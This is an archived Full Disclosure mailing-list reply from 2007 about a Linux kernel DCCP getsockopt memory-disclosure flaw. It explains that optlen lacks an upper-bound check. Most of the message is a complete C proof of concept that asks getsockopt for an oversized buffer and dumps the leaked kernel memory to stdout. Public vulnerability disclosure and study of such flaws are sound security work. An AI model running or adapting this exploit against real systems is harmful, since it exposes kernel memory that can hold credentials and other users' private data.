Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Linux Kernel DCCP Memory Disclosure Vulnerability
From: Robert Święcki <jagger () swiecki net>
Date: Tue, 27 Mar 2007 22:33:14 +0200


...
if (get_user(len, optlen))
  return -EFAULT;
if (len < sizeof(int))
   return -EINVAL;

Actually, `optlen' is not checked againist upper limit as well, so we
can simply use any large positive value for getsockopt()'s optlen and we
will be able  to use it on IA32 cpus as well, without playing with
signedness. I must be blind :).

POC:
#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
     void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
     if (mem == (void*)-1) {
        printf("Alloc failed\n");
        return -1;
     }
     /* SOCK_DCCP, IPPROTO_DCCP */
     int s = socket(PF_INET, 6, 33);
     if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
     }
    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
     int len = BUFSIZE;
     int x = getsockopt(s, 269, 11, mem, &len);

     if (x == -1)
        perror("SETSOCKOPT");
     else
        printf("SUCCESS\n");

     write(1, mem, BUFSIZE);

     return 0;
}



-- 
Robert Swiecki - http://www.swiecki.net
NEVER EVER mess with a PCB jumper you don't understand, even if it's
labelled "SEX AND FREE BEER"   (C)1992 Dave Haynie - Amiga developer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault